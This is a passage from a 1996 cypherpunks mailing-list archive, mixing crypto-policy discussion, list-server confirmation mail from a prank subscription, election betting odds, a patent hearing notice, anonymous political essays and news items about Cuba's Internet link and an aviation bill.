Message-ID: <v02130500ae96306f12a0@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


>I don't see how authorization certificates solve this problem.  How
>would you determine if someone was qualified to receive an authorization
>certificate?  And what would you do to make them stop using the service
>if they abuse it, and to stop them from getting new authorization
>certificates?
>
>Thanks,
>Hal

I guess I was mistaken about how rigorous identification checking was
performed at various CAs.  Verisign used to advertise three levels of CA
checking, although I can only find two on their Web site at this time.  The
lowest, Class 1, is simply tied to your email address and is inadequate for
my purposes.  Class 2 Digital IDs provide identity assurance by requiring
third-party confirmation of your name, mailing address, and other personal
information.  Although by no means bullet-proof dependence on Class 2 might
be a workable alternative to a substantial, up-front, money escrow (as
suggested) which I believe would make my service unworkable.

-- Steve






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com
Date: Sat, 26 Oct 1996 02:00:43 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: http://www.clintongore96.com/ is hacked.
Message-ID: <199610260900.CAA20719@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:42 PM 10/25/96 -0700, Declan McCullagh <declan@eff.org> wrote:
>It's a parody site.
>www.cg96.org is the real one.

That and www.clintongore.org are run by the Committee To Re-Elect
the President, at 2100 M St. NW, Washington DC.
But there are at least four CLINTONGORE#-DOM entries in whois,
plus some CG4-DOM and CG5-DOM.  Some are less official than others :-)

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk
  Imagine if three million people voted for somebody they _knew_,
  and the politicians had to count them all.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L-Soft list server at EDS (1.8b)"             <LISTSERV@plwils00.xweb.eds.com>
Date: Sat, 26 Oct 1996 00:03:37 -0700 (PDT)
To: Cypherpunks Suck <cypherpunks@toad.com>
Subject: You are now subscribed to the COOL_TRAVELS list
Message-ID: <199610260703.CAA15495@plwils00.xweb.eds.com>
MIME-Version: 1.0
Content-Type: text/plain


Sat, 26 Oct 1996 02:03:21

Your subscription to  Continental Online (COOL) Travel  Specials has been
confirmed. Please  keep this E-mail  as it contains  important infomation
about the list you've joined.

There are two distinct e-mail addresses that you should be aware of.

1.  listserv  address:  LISTSERV@LISTSERV.XWEB.EDS.COM. 2.  mailing  list
address: COOL_TRAVELS@LISTSERV.XWEB.EDS.COM.


The first address:

LISTSERV@LISTSERV.XWEB.EDS.COM:

This  is  a  non-human,  administrative,  automatic-reply  address.  This
address works  similar to a telephone  voice response system. You  dial a
specific  number to  connect  to  the voice  response  system, enter  the
command/option to  complete a specific  task. There  is not an  option to
chat with  the voice response  system. Similarly, the address  above does
not recognize anything but pre-defined commands.

When you send E-mail to LISTSERV@LISTSERV.XWEB.EDS.COM, with a command in
the message body, LISTSERV@LISTSERV.XWEB.EDS.COM will reply to you with a
pre-defined response  to your command.  Commands are not  case sensitive,
and the "subject:" field does not matter.

Here are some useful commands.

subscribe cool_travels  firstname lastname  (To subscribe to  the mailing
list   cool_travels  or   overwrite  your   existing  account   with  new
information)

unsubscribe cool_travels (To unsubscribe the cool_travels list)

For security reasons, when you  unsubscribe/signoff the list will ask you
for a confirmation. When you  receive the confirmation, use your mailer's
"reply" feature and type OK, and nothing else, in the reply message. This
is meant to verify  that you really do want to be  removed from the list.
LISTSERV will  notify you  once the operation  is successful.  Please *DO
NOT* include the original confirmation message in your OK reply.

Again, send commands only to LISTSERV@LISTSERV.XWEB.EDS.COM.


The second important address is:

COOL_TRAVELS@LISTSERV.XWEB.EDS.COM:

This is  the mailing list  that will  bring you discounts  and promotions
from Continental Airlines. This is a one-way, announce-only mailing list.
It does  not accept mail postings  from the subscribers. Please  do *NOT*
reply to the messages sent to you from this mailing list. If you need any
assistance, please send an E-mail to:

WEBMASTER@MAIL1.FLYCONTINENTAL.COM

with COOL_TRAVELS  in the "subject:"  field. We  will be happy  to assist
you.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L-Soft list server at EDS (1.8b)"             <LISTSERV@plwils00.xweb.eds.com>
Date: Sat, 26 Oct 1996 00:05:17 -0700 (PDT)
To: Cypherpunks Suck <cypherpunks@toad.com>
Subject: Welcome to Continental Airlines COOL_TRAVELS
Message-ID: <199610260703.CAA15497@plwils00.xweb.eds.com>
MIME-Version: 1.0
Content-Type: text/plain


Thank you for subscribing to COOL (Continental On-line) Travel Specials.
With your subscription you should receive a weekly E-mail featuring
Continental Airlines specials and promotions.

This is a post only list.  That means the list does not accept new or reply
mail.  Please do not send mail to the list.  All postings from subscribers will
be automatically discarded.  Please refer to your confirmation mail for
information on leaving the list and contacting the webmaster.

We plan to send notices out on Wednesdays.  However, we cannot
guarantee delivery on a specific day due to any unforseen Internet
problems, which we have no control over.

Thanks again for subscribing to COOL Travel Specials from Continental
Airlines.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L-Soft list server at EDS (1.8b)"             <LISTSERV@plwils00.xweb.eds.com>
Date: Sat, 26 Oct 1996 01:54:52 -0700 (PDT)
To: Cypherpunks Suck <cypherpunks@toad.com>
Subject: Command confirmation request (203E30)
Message-ID: <199610260852.DAA15841@plwils00.xweb.eds.com>
MIME-Version: 1.0
Content-Type: text/plain


Your command:

                          SIGNOFF COOL_TRAVELS

has been received. For security reasons, you are now required to reply to
this  message, as  explained  below,  to confirm  the  execution of  your
command. If  you have problems with  this procedure, you can  contact the
list owner directly  (COOL_TRAVELS-request@LISTSERV.XWEB.EDS.COM) and ask
to be manually removed from the list.

To confirm  the execution of  your command,  simply reply to  the present
message and type  "ok" (without the quotes) as the  text of your message.
Just the word "ok" - do not  retype the command. This procedure will work
with any mail  program that fully conforms to the  Internet standards for
electronic  mail. If  you receive  an error  message, try  sending a  new
message  to  LISTSERV@LISTSERV.XWEB.EDS.COM  (without using  the  "reply"
function - this  is very important) and  type "ok 203E30" as  the text of
your message.

Finally,  your command  will be  cancelled  automatically if  you do  not
confirm it  within 48h. After that  time, you must start  over and resend
the command to get  a new confirmation code. If you  change your mind and
decide that  you do NOT want  to confirm the command,  simply discard the
present message and let the command expire on its own.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L-Soft list server at EDS (1.8b)"             <LISTSERV@plwils00.xweb.eds.com>
Date: Sat, 26 Oct 1996 01:53:10 -0700 (PDT)
To: Cypherpunks Suck <cypherpunks@toad.com>
Subject: Your message to COOL_TRAVELS-request@LISTSERV.XWEB.EDS.COM
Message-ID: <199610260852.DAA15846@plwils00.xweb.eds.com>
MIME-Version: 1.0
Content-Type: text/plain


Sat, 26 Oct 1996 03:52:44

Your  message  to   COOL_TRAVELS-request@LISTSERV.XWEB.EDS.COM  has  been
forwarded to  the "list owners"  (the people who manage  the COOL_TRAVELS
list).  If you  wanted  to reach  a  human being,  you  used the  correct
procedure and you  can ignore the remainder of this  message. If you were
trying to send a command for the computer to execute, please read on.

The COOL_TRAVELS list is managed  by a LISTSERV server. LISTSERV commands
should    always    be   sent    to    the    "LISTSERV"   address,    ie
LISTSERV@LISTSERV.XWEB.EDS.COM. LISTSERV never  tries to process messages
sent to  the COOL_TRAVELS-request address;  it simply forwards them  to a
human being, and acknowledges receipt with the present message.

The "listname-request" convention originated on  the Internet a long time
ago. At  the time, lists were  always managed manually, and  this address
was defined as an alias for the  person(s) in charge of the mailing list.
You would write to the  "listname-request" address to ask for information
about the list, ask  to be added to the list,  make suggestions about the
contents and policy, etc. Because this  address was always a human being,
people  knew and  expected to  be  talking to  a  human being,  not to  a
computer.  Unfortunately, some  recent  list  management packages  screen
incoming  messages  to  the  "listname-request" address  and  attempt  to
determine whether they are requests to  join or leave the list. They look
for words such as "subscribe", "add",  "leave", "off", and so on. If they
decide your message is  a request to join or leave  the list, they update
the list automatically;  otherwise, they forward the message  to the list
owners. Naturally, this means that if  you write to the list owners about
someone else's  unsuccessful attempts to  leave the list, you  stand good
chances of  being automatically removed  from the list, whereas  the list
owners will never receive your message. No one really benefits from this.
There is no  reliable mechanism to contact a human  being for assistance,
and you can never  be sure whether your request will  be interpreted as a
command or as a message to the list owners. This is why LISTSERV uses two
separate addresses, one for the people in  charge of the list and one for
the computer  that runs it.  This way you  always know what  will happen,
especially if you are writing in a language other than English.

In  any case,  if your  message was  a LISTSERV  command, you  should now
resend it  to LISTSERV@LISTSERV.XWEB.EDS.COM.  The list owners  know that
you have  received this message and  may assume that you  will resend the
command  on your  own. You  will find  instructions for  the most  common
administrative requests below.

*********************
* TO LEAVE THE LIST *
*********************

Write to LISTSERV@LISTSERV.XWEB.EDS.COM and, in  the text of your message
(not the subject line), write: SIGNOFF COOL_TRAVELS

********************
* TO JOIN THE LIST *
********************

Write to LISTSERV@LISTSERV.XWEB.EDS.COM and, in  the text of your message
(not the subject line), write: SUBSCRIBE COOL_TRAVELS

************************
* FOR MORE INFORMATION *
************************

Write to LISTSERV@LISTSERV.XWEB.EDS.COM and, in  the text of your message
(not the  subject line),  write: "HELP" or  "INFO" (without  the quotes).
HELP will give you a short help  message and INFO a list of the documents
you can order.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Sat, 26 Oct 1996 04:40:58 -0700 (PDT)
To: cypherpunks@toad.com
Subject: anonymous oddsman
Message-ID: <199610261128.EAA22076@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain



[Please repost these odds where appropriate.]
Below, we find one of the oddsman's final gambling reports on all
the candidates listed on 50 states. The anonymous oddsman service
will cease for about 3&1/2 years or so after Nov. 5th, but we hope
to bring you at least one more update before then. Thanks to all
who have helped.

              Prices @ 09:05 BST Sat 26th Oct 96
        +---------+----------------+----------------+
        |         |  Ladbroke's    | William Hill   |
        +---------+----------------+----------------+
        | Clinton | Not currently offered by either |
        | Dole    |     7:1        |      8:1       |
        | Perot   |   No bets      |    500:1       |
        | Browne  | Not currently offered by either |
        +---------+----------------+----------------+
        | Phone   | +44-800-524524 | +44-800-444040 |
        | Numbers:|                |                |
        +---------+----------------+----------------+

Our roving reporter reports "still nothing from Coral." Then, in
his own inimitable terminology, he offers the following:

        "Does the fact that they are not offering any bets
        on Harry Browne mean that they reckon his chances
        are as good as trouser-brain   ???       :-)"

The oddsman cannot comment on this for the following two reasons:

1. Like the U.S. news media, he is trying to maintain a "sheen
of objectivity," even though pretty-much-everyone knows who the
oddsman is pulling for.

2. The anonymous oddsman is a family service! ;)

Still no word from Moscow, and now the oddsman is getting more
curious than ever about whether there are still Clinton odds in
mother Russia. Interesting that Ladbroke house has even stopped
taking _Perot_ bets now. The horse race ends before it begins.
anonymous oddsman

"Demeaning the integrity of the U.S. Presidential election process
for you on a regular basis, at no charge."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bradley Ward Allen <ulmo@Q.Net>
Date: Sat, 26 Oct 1996 06:16:18 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: CyberPromo out of service, near bankruptcy
In-Reply-To: <199610252044.QAA12779@smtp2.interramp.com>
Message-ID: <3h3ez1g92p.fsf@Q.Net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> I rarely post re: anything but crypto policy, but what the heck -
> Cyber Promotions is down. It may never get up.

Thanks for the note, I find it interesting and relevant to many things
I'm working on to eliminate this illegal harassing unsolicited spam.
(Note that my ISP, Panix, also has optional spam filters, started
within the last few months (forget date), actively being updated, and
they hoped that all ISPs would pick up on the idea, so as to drive the
spammers out of business.)

However, you make this claim that it has something to do with crypto
policy.  What?  That those who started TLG.NET, an entity improperly
considering technical requests to their postmasters to further deliver
email to their customers (as listed in administrative contacts for
their network designations (IP#s, domain names, etc.) that came back
as undeliverable to offending entities to stop (illegal) harassment as
a violation of first amendment rights, thus themselves becoming
parties of the harassment (and showing their udder stupidity, a trait
Brett Glass warned me of of some other functions some of their
founders have but that I initially didn't want to believe), are some
of the same people who operate this mailing list?  That's a rather
tenuous connection between crypto policy and spamming!  I see that in
the big picture they're all connected somehow, but please, let's be a
bit more accurate!  Jesus.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQEVAwUBMnIPCpxWhFYc6x9VAQGLHAf9HWX4Xkdol0icms4yUNnM+re1Ztk3rdy6
2jpx3pHNDGxY7TXmBw4thBCJXygMWQYCn/NrIC78Rp4+Bfs9cZwjKtr7unrCUnJn
7kW6aEtKaHWovdUVb04LRSOVafusBwkTbeqvr0ghutHUILlDvziEODjixlkFisCZ
pLNusTwhQziVANudFYMAjL0dQ2mGD8hFJ78pEIFGYCj1O/xDswyWCa1HABDVCWdU
WdbeZe0gFSuLGO+Ap5fXeU0ay0GMBt8DO09Ajg1OxKusmXZaaZHSnL5sl0+E3gkm
Bf902eIGGMooeYPEfbozG1SN1RkDq937Cu+SQw6TlLpzmJq4W974Jw==
=Z6mg
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: h2@juno.com (Michael B Amoruso)
Date: Sat, 26 Oct 1996 05:58:41 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Me again -- apologies and explanations
Message-ID: <19961026.085203.6614.0.h2@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


I dont know what the hell is happening;  My friend comes over and he is
really intrested in all this stuff...I want to apologize for any trouble
caused...My name goes with every damn message...Again, sorry everyone. 
Guess he wanted to rather have me screwed then him.  Im unsubscribing...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L-Soft list server at EDS (1.8b)"             <LISTSERV@plwils00.xweb.eds.com>
Date: Sat, 26 Oct 1996 07:41:49 -0700 (PDT)
To: Cypherpunks Suck <cypherpunks@toad.com>
Subject: Command confirmation request (7B3F47)
Message-ID: <199610261441.JAA17507@plwils00.xweb.eds.com>
MIME-Version: 1.0
Content-Type: text/plain


Your command:

                          SIGNOFF COOL_TRAVELS

has been received. For security reasons, you are now required to reply to
this  message, as  explained  below,  to confirm  the  execution of  your
command. If  you have problems with  this procedure, you can  contact the
list owner directly  (COOL_TRAVELS-request@LISTSERV.XWEB.EDS.COM) and ask
to be manually removed from the list.

To confirm  the execution of  your command,  simply reply to  the present
message and type  "ok" (without the quotes) as the  text of your message.
Just the word "ok" - do not  retype the command. This procedure will work
with any mail  program that fully conforms to the  Internet standards for
electronic  mail. If  you receive  an error  message, try  sending a  new
message  to  LISTSERV@LISTSERV.XWEB.EDS.COM  (without using  the  "reply"
function - this  is very important) and  type "ok 7B3F47" as  the text of
your message.

Finally,  your command  will be  cancelled  automatically if  you do  not
confirm it  within 48h. After that  time, you must start  over and resend
the command to get  a new confirmation code. If you  change your mind and
decide that  you do NOT want  to confirm the command,  simply discard the
present message and let the command expire on its own.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L-Soft list server at EDS (1.8b)"             <LISTSERV@plwils00.xweb.eds.com>
Date: Sat, 26 Oct 1996 07:44:05 -0700 (PDT)
To: Cypherpunks Suck <cypherpunks@toad.com>
Subject: Output of your job "cypherpunks"
Message-ID: <199610261443.JAA17536@plwils00.xweb.eds.com>
MIME-Version: 1.0
Content-Type: text/plain


> ok 203E30
Confirming:
> SIGNOFF COOL_TRAVELS
You have been removed from the COOL_TRAVELS list.

Summary of resource utilization
-------------------------------
 CPU time:        0.016 sec                Device I/O:        1
 Overhead CPU:    0.008 sec                Paging I/O:        0
 CPU model:        IP22




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 26 Oct 1996 07:26:36 -0700 (PDT)
To: cypherpunks@toad.com
Subject: $30_bil
Message-ID: <1.5.4.32.19961026142543.00688660@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   10-27-96. NYP Book Review:

   SECRET AGENCIES
   U.S. Intelligence in a Hostile World.
   By Loch K. Johnson.
   262 pp. New Haven:
   Yale University Press. $30.

      Johnson, formerly assistant to Les Aspin, aims to
      explain what the dozen American intelligence agencies
      actually do with $30 billion a year. Absent the cartoon
      heroics, it's not far from Tom Clancy. Mr. Johnson
      avoids mushy reflections on the human costs of covert
      action -- this book is clearly meant for policy wonks --
      but does note that "the long-term consequences of covert
      actions have seldom been foreseen -- and have often
      proved detrimental to the United States."

   -----

   http://jya.com/$30bil.txt  (5 kb) Server's got lead in its. Try, try.

   ftp://jya.com/pub/incoming/$30bil.txt

   $30_bil









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 26 Oct 1996 11:00:30 -0700 (PDT)
To: cypherpunks@toad.com
Subject: IEEE P1363 Meeting Notice
Message-ID: <v03007800ae97fff2b47e@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


Date: Sat, 26 Oct 1996 10:59:00 -0400 (EDT)
To: Multiple Recipients of e$pam <e$pam@intertrader.com>
From: e$pam@intertrader.com (e$pam)
Reply-To: e$@thumper.vmeng.com
X-Comment: To unsubscribe, send an email to e$pam-request@intertrader.com
X-Comment: containing the command "unsubscribe e$pam"
Precedence: Bulk
Subject: IEEE P1363 Meeting Notice
X-orig-from: gor@theory.lcs.mit.edu (Raymond Sidney) (by way of
rah@shipwright.com
X-e$pam-source: Various

Forwarded by Robert Hettinga

-----------------------------------------------------------------------
Date: 24 Oct 1996 21:36:39 GMT
 From: gor@theory.lcs.mit.edu (Raymond Sidney) (by way of rah@shipwright.com
 (Robert A. Hettinga))
 To: rah@shipwright.com
 Subject: IEEE P1363 Meeting Notice
 Organization: MIT Laboratory for Computer Science
 Mime-Version: 1.0
 Path:
 news-central.tiac.net!news-in.tiac.net!news-in3.tiac.net!news.sprintlink.net!ne
w
 s-dc-5.sprintlink.net!voskovec.radio.cz!news.uni-stuttgart.de!news.ruhr-uni-boc
h
 um.de!news.rhrz.uni-bonn.de!RRZ.Uni-Koeln.DE!news.gtn.com!blackbush.xlink.net!t
a
 nk.news.pipex.net!pipex!news.be.innet.net!INbe.net!news.nl.innet.net!INnl.net!h
u
 nter.premier.net!news.mathworks.com!news.kei.com!uhog.mit.edu!grapevine.lcs.mit




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Cortes <lspeidel@earthlink.net>
Date: Sat, 26 Oct 1996 14:11:27 -0700 (PDT)
To: cypherpunks@toad.com
Subject: (no subject)
Message-ID: <32726392.3E0F@earthlink.net>
MIME-Version: 1.0
Content-Type: text/plain


unsuscribe cypherpunks




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@miron.vip.best.com
Date: Sat, 26 Oct 1996 15:02:01 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Tim May is a fine person.
Message-ID: <199610262157.OAA00662@miron.vip.best.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim May is the author of "The Crypto Anarchist Manifesto" and the
"Cypherpunks FAQ". These seminal works do much to promote the
cypherpunk concept, whereby ordinary people can limit the power of
government to snoop on their communications, by using the power of
cryptography. By tirelessly promoting strong unescrowed cryptography, 
Tim May frightens those that would enslave us all. His opposition
to the oppressive ITAR regs puts Tim May among those who work to 
advance the development of culture and against those who would work 
to suppress it.

Much of the time devoted to these concerns could have been devoted
to purely personal goals. Tim May must be hailed as a truly noble
supporter of the advance of freedom and humanity.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Sat, 26 Oct 1996 14:53:12 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Fed Ct hrg re Diffie-Hellman & Hellman-Merkle patents
Message-ID: <3.0b28.32.19961026145513.006f6910@ricochet.net>
MIME-Version: 1.0
Content-Type: text/plain



A hearing is scheduled in federal district court in San Jose for 10/30 at
10:00 AM on _Schlafly v. Public Key Partners_ and _RSA Datasec v. Cylink_.
The hearing is on defendant Cylink's motion(s) for summary judgment
regarding the validity of the Diffie-Hellman and Hellman-Merkle patents. 

The district court is located at 280 S. First in San Jose. Judge Williams
is in Courtroom 4 on the 5th floor. There are 12 matters scheduled at 10:00
AM so it's unlikely that this matter will be heard at exactly 10:00. (It's
listed as fifth in the court calendar in The Register and the Daily
Journal, but I've got no clue about their algorithm for calling cases.) I
don't know if it will be interesting or boring. The fewer metal things you
bring the faster you can get through the metal detectors. 

More information is available at <http://www.cruzio.com/~schlafly> and
<http://www.sec.gov/Archives/edgar/data/1005230/0000950005-96-000312.txt>.
--
Greg Broiles                |  "We pretend to be their friends,
gbroiles@netbox.com         |   but they fuck with our heads."
http://www.io.com/~gbroiles |
                            |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bovine Remailer <haystack@cow.net>
Date: Sat, 26 Oct 1996 12:34:21 -0700 (PDT)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <9610261923.AA08071@cow.net>
MIME-Version: 1.0
Content-Type: text/plain


It seems fair to say that if power was morely fairly distributed around the
world, we could expect to see more cryptologists of the class of Chaum and
Goldwasser, since third world people with similairly high aptitudes for the
subject could think about these higher level (in terms of Maslow) things
instead of how to avoid starvation.

It also seems fair that we could expect the publication of more
cryptological schemes that put governments at a disadvantage if the
countless, starving third world people were just above the level of
starvation and thinking of government collapse instead. 

These two points suggest that the millions of deaths in the third world have
delayed the very collapse of governments that cryptoanarchists dream about
in their beds at night.

Now it could be argued that this is all in the past since cypherpunks
already posses enough knowledge about cryptology to acheive the collapse of
governments and all they are doing is waiting for the inevitable now and
flaming each other to pass the time. :) What will cryptoanarchists do
after the collapse of governments, though?  If the ultimate goal of
cryptoanarchy is to transfer power into the hands of the information
producers and traders, then it seems that the third world presents a huge
reservoir of potential information producers. Thus, cypherpunks ought to
care about the conditions there. 

Here is a scenario cryptoanarchists might enjoy: Some corporations which
rely primary on the actualization of scientific ideas into products along
information traders buy the ownership of the resources from other
corporations in the third world, and turn them back over to the people
there.  The third world people are then free from low-level material worries
and can put their energy into information production, which the people
controlling the information trade are careful to reward properly. 

Note that, under this scenario, the improvement of conditions in the Third
World does not imply a diminishing of the power of the West with respect to
the rest of the world: The West will still dominate the actualization of
scientific ideas into products as they already own the capital to do that.
Also they can will still own the computer networks the information is traded
on. Thus, the impact of material resouce loss is minimalized over the
long term.

Note also that the conditions do not have to be much above the level of
guarenteeing non-starvation, either. Consider, for instance, how far Eastern
European students are ahead of Western students in terms of scientific and
mathematical knowledge. The conditions there can hardly be thought of as
being much above non-starvation levels. 

Under this scheme the information traders benefit. The corporations which
actualize scientific ideas benefit. The corporations which sell their
ownership of third world resources benefit.  The information producers in
the third world benefit.  The non-information producers in the third world
no longer starve, as well, so people can feel better that they are living in
a happier world!

Once Westerners start exploiting untapped information production resevoirs
like Eastern Europe and the former Soviet Union,  all this good stuff might
actually happen, too! :)







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bovine Remailer <haystack@cow.net>
Date: Sat, 26 Oct 1996 12:40:11 -0700 (PDT)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <9610261929.AA08092@cow.net>
MIME-Version: 1.0
Content-Type: text/plain


It seems fair to say that if power was morely fairly distributed around the
world, we could expect to see more cryptologists of the class of Chaum and
Goldwasser, since third world people with similairly high aptitudes for the
subject could think about these higher level (in terms of Maslow) things
instead of how to avoid starvation.

It also seems fair that we could expect the publication of more
cryptological schemes that put governments at a disadvantage if the
countless, starving third world people were just above the level of
starvation and thinking of government collapse instead. 

These two points suggest that the millions of deaths in the third world have
delayed the very collapse of governments that cryptoanarchists dream about
in their beds at night.

Now it could be argued that this is all in the past since cypherpunks
already posses enough knowledge about cryptology to acheive the collapse of
governments and all they are doing is waiting for the inevitable now and
flaming each other to pass the time. :) What will cryptoanarchists do
after the collapse of governments, though?  If the ultimate goal of
cryptoanarchy is to transfer power into the hands of the information
producers and traders, then it seems that the third world presents a huge
reservoir of potential information producers. Thus, cypherpunks ought to
care about the conditions there. 

Here is a scenario cryptoanarchists might enjoy: Some corporations which
rely primary on the actualization of scientific ideas into products along
information traders buy the ownership of the resources from other
corporations in the third world, and turn them back over to the people
there.  The third world people are then free from low-level material worries
and can put their energy into information production, which the people
controlling the information trade are careful to reward properly. 

Note that, under this scenario, the improvement of conditions in the Third
World does not imply a diminishing of the power of the West with respect to
the rest of the world: The West will still dominate the actualization of
scientific ideas into products as they already own the capital to do that.
Also they can will still own the computer networks the information is traded
on. Thus, the impact of material resouce loss is minimalized over the
long term.

Note also that the conditions do not have to be much above the level of
guarenteeing non-starvation, either. Consider, for instance, how far Eastern
European students are ahead of Western students in terms of scientific and
mathematical knowledge. The conditions there can hardly be thought of as
being much above non-starvation levels. 

Under this scheme the information traders benefit. The corporations which
actualize scientific ideas benefit. The corporations which sell their
ownership of third world resources benefit.  The information producers in
the third world benefit.  The non-information producers in the third world
no longer starve, as well, so people can feel better that they are living in
a happier world!

Once Westerners start exploiting untapped information production resevoirs
like Eastern Europe and the former Soviet Union,  all this good stuff might
actually happen, too! :)








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 26 Oct 1996 13:49:11 -0700 (PDT)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: slander and call for lawyers. :)
In-Reply-To: <7BBDwD2w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.94.961026164648.10071G-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 25 Oct 1996, Dr.Dimitri Vulis KOTM wrote:

> Sandy Sandfort <sandfort@crl.com> writes:
> > 
> > On Fri, 25 Oct 1996, Black Unicorn wrote to Dimitri:
> > 
> > > If you don't watch it I'll have a pair of my staff represent
> > > [Ray] free of charge.
> > 
> > Now THAT would be a community service.
> 
> Why don't you use the funds pledges for my defunct trip to California
> for Ray's lithium bill.

Suggesting that a person is on a psychoactive mediciation with the purpose
of harming that persons image or character is likely actionable.

I'd be careful if I were you.  If said individual ever manages to
substantiate damages you've got an interesting time ahead of you.

> 
> ---
> 
> Dr.Dimitri Vulis KOTM
> Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps
> 

--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@sm1.gte.net>
Date: Sat, 26 Oct 1996 18:00:28 -0700 (PDT)
To: anonymous@miron.vip.best.com
Subject: Re: Tim May is a fine person.
In-Reply-To: <199610262157.OAA00662@miron.vip.best.com>
Message-ID: <3272B38F.73BA@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


anonymous@miron.vip.best.com wrote:
> Tim May is the author of "The Crypto Anarchist Manifesto" and the
> "Cypherpunks FAQ". These seminal works do much to promote the
> cypherpunk concept, whereby ordinary people can limit the power of
> government to snoop on their communications, by using the power of
> cryptography. By tirelessly promoting strong unescrowed cryptography,
> Tim May frightens those that would enslave us all. His opposition
> to the oppressive ITAR regs puts Tim May among those who work to
> advance the development of culture and against those who would work to suppress it.
> Much of the time devoted to these concerns could have been devoted
> to purely personal goals. Tim May must be hailed as a truly noble
> supporter of the advance of freedom and humanity.

It's illogical to argue that anyone is a fine person just because they did
a "good thing" somewhere along the line.  Marge Schott found that out, eh?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 26 Oct 1996 16:39:07 -0700 (PDT)
To: cypherpunks@toad.com
Subject: [NEWS] Cuba and the Internet
Message-ID: <01IB3Z4FIALSA7370I@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	I wonder what addresses they'll be using? I can't recall a Cuba
domain, but I may easily be mistaken. If some consistent pattern can be
found, cgi scripts could block them from getting to technically useful data,
thus decreasing Cuba's economic viability further.
	-Allen

>   ______________________________________________________________________
>                        Schoolhouse Videos and CD's
>   ______________________________________________________________________
>                 Cuba to open Internet link, but only for some
>  __________________________________________________________________________
>      Copyright (c) 1996 Nando.net
>      Copyright (c) 1996 Reuter Information Service
      
>   HAVANA (Oct 5, 1996 12:36 p.m. EDT) - Cuba will establish links with
>   the Internet from next week, but will initially allow only selected
>   scientific and other state institutions to have access to the
>   international information network, official Cuban media said Saturday.
   
>   The ruling Communist Party newspaper Granma said the state-run
>   National Center for Automized Exchange of Information (CENIAI),
>   designated as the national provider of the service, would set up the
>   link next Friday.
   
>   Cuban authorities said in June that access to the Internet would be
>   defined by Cuba's interests and priority would be given to individuals
>   and bodies with most relevance to the country's life and development.
   
>   Granma said the Internet link give Cuba access to a bank of world
>   knowledge and enable it to present its point of view to the world,
>   including in areas such as scientific advances.
   
[...]

>    Copyright (c) 1996 Nando.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 26 Oct 1996 16:46:18 -0700 (PDT)
To: cypherpunks@toad.com
Subject: [NEWS] (late, sorry) Airline Tracking Bill signed
Message-ID: <01IB3ZG2X3PGA7370I@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


>   BARRON'S Online - Market Surveillance for the Financial Elite
>   ______________________________________________________________________
>                                  Centura
>   ______________________________________________________________________
>       President signs aviation bill with clause opposed by labor unions
>  __________________________________________________________________________
>      Copyright (c) 1996 Nando.net
>      Copyright (c) 1996 The Associated Press
      
